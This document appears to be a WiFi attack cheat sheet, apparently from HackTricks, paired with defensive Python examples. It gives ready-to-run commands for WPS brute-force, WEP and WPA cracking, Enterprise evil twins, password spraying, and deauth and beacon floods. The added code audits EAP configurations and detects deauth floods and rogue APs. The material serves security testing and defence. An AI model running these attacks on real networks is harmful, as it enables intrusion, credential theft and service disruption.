Basic WiFi Commands
ip link show # List available interfaces
airmon-ng check kill # Kill interfering processes
airmon-ng start wlan0 # Enable monitor mode
airmon-ng stop wlan0mon # Disable monitor mode
airodump-ng wlan0mon # Scan 2.4 GHz networks
airodump-ng wlan0mon --band a # Scan 5 GHz networks
airodump-ng wlan0mon --wps # Show WPS-enabled APs
iw dev wlan0 scan | grep "^BSS\|SSID\|WPA" # Quick scan summary
Airgeddon
All-in-one bash script covering WEP, WPA-PSK, WPS, Evil Twin, and Enterprise attacks with a guided menu.
docker run --rm -ti --name airgeddon \
--net=host --privileged -p 3000:3000 \
v1s1t0r1sh3r3/airgeddon
EAPHammer
Focused on WPA-Enterprise attacks, EAP downgrade, and credential capture.
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
Wifite2
Automates WPS/WEP/WPA-PSK attacks: sets monitor mode, scans, selects targets, and runs appropriate attacks.
wifiphisher
Performs Evil Twin, KARMA, and Known Beacons attacks combined with phishing templates to capture PSKs or portal credentials.
WPS Attacks
WPS (Wi-Fi Protected Setup) uses an 8-digit PIN validated in two halves, giving only ~11,000 effective combinations.
WPS Brute Force
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
WPS Pixie Dust Attack
Some APs use predictable nonces (E-S1, E-S2), making the WPS PIN recoverable offline:
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
# Without monitor mode
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
Null PIN Attack
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
WEP
WEP is broken due to the tiny 24-bit IV space, RC4 keystream reuse, and unkeyed CRC32 integrity. A practical break:
# Collect IVs
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon
# Speed up with ARP replay
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
# Crack with PTW attack
aircrack-ng wep_capture-01.cap
WPA/WPA2 PSK
PMKID Attack (No Client Needed)
Capture a single EAPOL frame from the AP — no connected client required:
airmon-ng check kill && airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git && cd hcxdumptool && make && make install
hcxdumptool -o /tmp/attack.pcapng -i wlan0mon --enable_status=1
# Convert and crack
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
WPA Handshake Capture
# Monitor the target AP
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
# Force re-authentication via deauth
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0
# Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
WPA Enterprise (MGT)
EAP Authentication Methods
- EAP-MD5: Sends the MD5 hash of the password. Not recommended — vulnerable to dictionary attacks and provides no server authentication.
- EAP-TLS: Uses both client-side and server-side certificates. Strong when certificates are properly managed.
- PEAP: Creates a TLS tunnel, then authenticates via MSCHAPv2 inside. The most common enterprise method — the MSCHAPv2 challenge can be captured and cracked.
- EAP-TTLS: Provides mutual authentication through an encrypted tunnel. Only server-side certificates are required; the client uses credentials.
Username Capture
Even with PEAP-EAP-TLS, usernames are sent in plaintext in the EAP “Response Identity” message:
# Capture auth with airodump + wireshark, then filter:
# Display filter: eapol
# Look for "Response, Identity" packet
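The plaintext Response/Identity exposure described above, and the server-certificate validation that makes PEAP and EAP-TTLS safe against a rogue RADIUS server, can both be checked on the client side. The following Python is an added example, not HackTricks code: it parses a constructed EAPOL-encapsulated EAP Response/Identity to show that the outer identity travels unencrypted, and audits a wpa_supplicant network block (constructed weak and hardened versions) for anonymous_identity, ca_cert and domain_suffix_match. The SSID, user, realm and certificate path are made up; the option names are real wpa_supplicant options.

```python
"""EAP outer-identity exposure and wpa_supplicant WPA-EAP config audit.

Added example, not HackTricks code. Packets and config blocks are constructed.
"""
import struct

EAPOL_EAP_PACKET = 0          # EAPOL packet type carrying an EAP message
EAP_RESPONSE, EAP_TYPE_IDENTITY = 2, 1

def build_eapol_identity_response(identity, eap_id=1):
    """Construct an EAPOL(v2)-encapsulated EAP Response/Identity (test input only)."""
    ident = identity.encode()
    eap = struct.pack("!BBH", EAP_RESPONSE, eap_id, 5 + len(ident)) \
        + bytes([EAP_TYPE_IDENTITY]) + ident
    return struct.pack("!BBH", 2, EAPOL_EAP_PACKET, len(eap)) + eap

def parse_identity_response(pkt):
    """Return the identity string from an EAPOL-EAP Response/Identity, else None.

    Nothing here is decrypted: the identity is readable by anyone who captures
    the frame, which is the point of the Username Capture section above.
    """
    if len(pkt) < 9:
        return None
    _version, ptype, _length = struct.unpack_from("!BBH", pkt, 0)
    if ptype != EAPOL_EAP_PACKET:
        return None
    code, _eap_id, eap_len = struct.unpack_from("!BBH", pkt, 4)
    if code != EAP_RESPONSE or eap_len < 5 or pkt[8] != EAP_TYPE_IDENTITY:
        return None
    return pkt[9:4 + eap_len].decode(errors="replace")

def identity_leaks_username(identity):
    """True when the outer identity carries a real user name instead of an anonymous one."""
    local = identity.split("@", 1)[0].strip().lower()
    return local not in ("", "anonymous")

# Options a tunnelled-EAP (PEAP/EAP-TTLS) client block needs to resist a rogue AP/RADIUS.
REQUIRED_WPA_EAP_KEYS = ("anonymous_identity", "ca_cert", "domain_suffix_match")

def parse_network_block(text):
    """Parse a single wpa_supplicant network={...} block into a dict (values unquoted)."""
    inner = text.split("{", 1)[1].rsplit("}", 1)[0]
    cfg = {}
    for line in inner.splitlines():
        line = line.strip()
        if "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            cfg[key.strip()] = value.strip().strip('"')
    return cfg

def audit_network_block(text):
    """Return a list of issues for a WPA-EAP block; empty list means it passed."""
    cfg = parse_network_block(text)
    issues = []
    if cfg.get("key_mgmt") != "WPA-EAP":
        return issues                       # only enterprise blocks are audited
    for key in REQUIRED_WPA_EAP_KEYS:
        if not cfg.get(key):
            issues.append(f"missing {key}")
    if cfg.get("anonymous_identity") and identity_leaks_username(cfg["anonymous_identity"]):
        issues.append("anonymous_identity reveals the user name")
    return issues

# Constructed weak block: real user name as outer identity, no CA pinning, no name match.
WEAK_NETWORK = """
network={
    ssid="CorpWifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe@corp.example"
    password="CHANGEME"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed hardened block: anonymous outer identity, pinned CA, server name check.
HARDENED_NETWORK = """
network={
    ssid="CorpWifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@corp.example"
    identity="jdoe@corp.example"
    password="CHANGEME"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

if __name__ == "__main__":
    pkt = build_eapol_identity_response("jdoe@corp.example")
    print("outer identity on the wire:", parse_identity_response(pkt))
    print("weak block issues:", audit_network_block(WEAK_NETWORK))
    print("hardened block issues:", audit_network_block(HARDENED_NETWORK))
```

The hardened block is what defeats the Enterprise Evil Twin flow later on this page: with ca_cert and domain_suffix_match set, the supplicant rejects a hostapd-wpe/eaphammer certificate before any MSCHAPv2 exchange happens, and the anonymous outer identity means a passive capture learns only the realm.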
Enterprise Evil Twin
# Generate certificates
./eaphammer --cert-wizard
# Launch EAP Evil Twin
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
EAP Brute-Force (Password Spray)
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 \
--essid example-wifi \
--password bananas \
--user-list users.txt
DoS Attacks
# Deauthentication attack (aireplay-ng)
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
# Beacon flooding (create fake APs)
mdk4 wlan0mon b -a -w nta -m
# EAPOL flooding
mdk4 wlan0mon e -t EF:60:69:D7:69:2F
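The deauthentication and EAPOL floods above work because, without 802.11w management frame protection (PMF), a station accepts any deauth/disassoc frame that carries its AP's address. A wireless IDS catches them by rate and by shape. The following Python is an added example, not HackTricks code: it builds a constructed capture of raw 802.11 management frames (no FCS, made-up MAC addresses), parses the frame control field, and flags a transmitter that sends many deauth/disassoc frames in a short window or any deauth addressed to the broadcast address. The timestamps, threshold and window are assumptions chosen for the sample.

```python
"""Deauth/disassoc flood detection over raw 802.11 management frames.

Added example, not HackTricks code. All frames come from build_mgmt_frame()
and all MAC addresses are made up.
"""
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 8, 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Constructed 802.11 management frame without FCS (test input only)."""
    fc0 = (subtype << 4) | (TYPE_MGMT << 2)      # protocol version 0, type, subtype
    header = struct.pack("<BBH", fc0, 0, 0)      # frame control byte 0, flags, duration
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", 0)               # sequence control
    return header + body

def parse_frame(raw):
    """Return type, subtype, the three addresses and, for deauth/disassoc, the reason code."""
    fc0 = raw[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    frame = {"type": ftype, "subtype": subtype,
             "addr1": mac_str(raw[4:10]), "addr2": mac_str(raw[10:16]),
             "addr3": mac_str(raw[16:22]), "reason": None}
    if ftype == TYPE_MGMT and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return frame

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_bytes) in time order.

    Rule (a): a deauth/disassoc to the broadcast address, which no legitimate
    station sends for itself. Rule (b): a transmitter sending at least
    `threshold` deauth/disassoc frames within `window` seconds. Each
    transmitter is reported at most once per rule.
    """
    recent = defaultdict(deque)                  # transmitter -> recent timestamps
    alerts, flagged = [], set()
    for ts, raw in frames:
        f = parse_frame(raw)
        if f["type"] != TYPE_MGMT or f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        src = f["addr2"]
        if f["addr1"] == BROADCAST and (src, "broadcast") not in flagged:
            flagged.add((src, "broadcast"))
            alerts.append((src, f"broadcast deauth, reason {f['reason']}"))
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and (src, "flood") not in flagged:
            flagged.add((src, "flood"))
            alerts.append((src, f"flood: {len(q)} deauth/disassoc frames in {window}s"))
    return alerts

# Made-up addresses for the constructed capture.
AP, CLIENT, SPOOFER = "02:00:00:00:aa:01", "02:00:00:00:bb:02", "02:00:00:00:cc:03"

def sample_capture():
    """Constructed capture: 3 beacons, 1 benign client deauth, a 40-frame flood, 1 broadcast deauth."""
    frames = [(0.1 * i, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP)) for i in range(3)]
    frames.append((0.5, build_mgmt_frame(SUBTYPE_DEAUTH, AP, CLIENT, AP, struct.pack("<H", 3))))
    frames += [(1.0 + 0.02 * i, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7)))
               for i in range(40)]
    frames.append((3.0, build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, SPOOFER, AP, struct.pack("<H", 7))))
    return frames

if __name__ == "__main__":
    for src, why in detect_deauth_flood(sample_capture()):
        print(f"ALERT {src}: {why}")
```

The single client deauth with reason 3 (station leaving) never trips the detector; the 40-frame burst does at the tenth frame, and the broadcast deauth from a third address is reported on its own. Detection is the fallback: enabling PMF on the AP and clients makes these unauthenticated frames get discarded in the first place.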
Evil Twin & Rogue AP Attacks
Open Evil Twin
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Useful for capturing captive portal credentials and performing LAN attacks on connected clients.
WPA/WPA2 Evil Twin
Lure clients with a matching SSID and WPA2. Without the PSK the 4-way handshake will not complete, but you can capture it for cracking.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Enterprise Evil Twin
Downgrade authentication to capture credentials:
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
KARMA, MANA, and Known Beacons
| Attack | Description |
|---|---|
| KARMA | Rogue AP responds to all probe requests, tricking devices into connecting |
| MANA | Captures PNLs from broadcast probes and responds with known SSIDs |
| Loud MANA | Broadcasts responses for all ESSIDs seen in nearby devices’ PNLs |
| Known Beacons | Brute-forces ESSID list, responding to any name in a wordlist |
# MANA attack
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt
# Known Beacons
./eaphammer -i wlan0 --mana --known-beacons --known-ssids-file wordlist.txt
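Every rogue-AP variant on this page (open Evil Twin, WPA/WPA2 Evil Twin, KARMA/MANA, Known Beacons) shows up in a scan as a BSSID that is not in the asset inventory advertising a managed SSID, often with a different security class than the real AP. The same scan also reveals the weak configurations the earlier sections target (open, WEP, WPA1/TKIP, WPS enabled, no PMF). The following Python is an added example, not HackTricks code: it parses constructed `iw dev wlan0 scan` output (the command from the Basic WiFi Commands section, abridged to the fields used here), classifies each BSS, and compares it against a hypothetical inventory. All BSSIDs, SSIDs and the inventory are made up.

```python
"""Audit `iw dev <iface> scan` output for weak AP security and rogue/evil-twin APs.

Added example, not HackTricks code. SAMPLE_SCAN is constructed to look like
abridged `iw` output; KNOWN_APS is a hypothetical asset inventory.
"""
import re
from collections import defaultdict

SAMPLE_SCAN = """\
BSS 00:11:22:33:44:01(on wlan0)
\tfreq: 2437
\tcapability: ESS Privacy (0x0411)
\tSSID: CorpWifi
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: IEEE 802.1X
\t\t * Capabilities: 16-PTKSA-RC 1-GTKSA-RC MFP-required (0x00cc)
BSS 00:11:22:33:44:02(on wlan0)
\tfreq: 2462
\tcapability: ESS Privacy (0x0411)
\tSSID: CorpWifi
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: PSK
\t\t * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
BSS 00:11:22:33:44:03(on wlan0)
\tfreq: 2412
\tcapability: ESS Privacy (0x0411)
\tSSID: Legacy-Printer
BSS 00:11:22:33:44:04(on wlan0)
\tfreq: 5180
\tcapability: ESS (0x0401)
\tSSID: Guest
"""

# Hypothetical inventory: SSID -> (expected security class, authorised BSSIDs).
KNOWN_APS = {
    "CorpWifi": ("wpa2-enterprise", {"00:11:22:33:44:01"}),
    "Guest": ("open", {"00:11:22:33:44:04"}),
}

def parse_iw_scan(text):
    """Split iw scan output into one dict per BSS (only the fields audited here)."""
    bss_list, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1), "ssid": "", "privacy": False, "rsn": False,
                   "wpa1": False, "wps": False, "mfp": False, "akm": "", "ciphers": ""}
            bss_list.append(cur)
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("SSID:"):
            cur["ssid"] = s[5:].strip()
        elif s.startswith("capability:"):
            cur["privacy"] = "Privacy" in s      # Privacy bit without RSN/WPA IE means WEP
        elif s.startswith("RSN:"):
            cur["rsn"] = True
        elif s.startswith("WPA:"):
            cur["wpa1"] = True
        elif s.startswith("WPS:"):
            cur["wps"] = True
        elif s.startswith("* Authentication suites:"):
            cur["akm"] = s.split(":", 1)[1]
        elif s.startswith("* Pairwise ciphers:"):
            cur["ciphers"] = s.split(":", 1)[1]
        elif s.startswith("* Capabilities:") and "MFP" in s:
            cur["mfp"] = True                    # 802.11w management frame protection
    return bss_list

def security_class(bss):
    if bss["rsn"]:
        if "SAE" in bss["akm"]:
            return "wpa3"
        if "TKIP" in bss["ciphers"]:
            return "wpa2-tkip"
        return "wpa2-enterprise" if "802.1X" in bss["akm"] else "wpa2-psk"
    if bss["wpa1"]:
        return "wpa1"
    return "wep" if bss["privacy"] else "open"

def audit(bss_list, known=KNOWN_APS):
    """Return {bssid: [findings]} for weak settings and inventory mismatches."""
    findings = defaultdict(list)
    for bss in bss_list:
        sec, key = security_class(bss), bss["bssid"]
        if sec in ("open", "wep", "wpa1", "wpa2-tkip"):
            findings[key].append(f"weak security: {sec}")
        if bss["wps"]:
            findings[key].append("WPS enabled: PIN brute force / Pixie Dust exposure")
        if sec.startswith("wpa2") and not bss["mfp"]:
            findings[key].append("no PMF: deauth/disassoc frames are unauthenticated")
        if bss["ssid"] in known:
            exp_sec, exp_bssids = known[bss["ssid"]]
            if key not in exp_bssids:
                findings[key].append(f"unknown BSSID advertising managed SSID {bss['ssid']} (possible evil twin)")
            if sec != exp_sec:
                findings[key].append(f"security {sec} differs from inventory ({exp_sec})")
    return dict(findings)

if __name__ == "__main__":
    for bssid, issues in audit(parse_iw_scan(SAMPLE_SCAN)).items():
        print(bssid, "->", "; ".join(issues))
```

In the sample, the second CorpWifi BSS is exactly what an eaphammer `--auth wpa-psk` twin of an enterprise network looks like from the outside: a foreign BSSID, PSK instead of 802.1X, no PMF, and WPS advertised. Run the real `iw dev wlan0 scan` output through parse_iw_scan() on a schedule and diff the findings against the last run to get a simple rogue-AP alert.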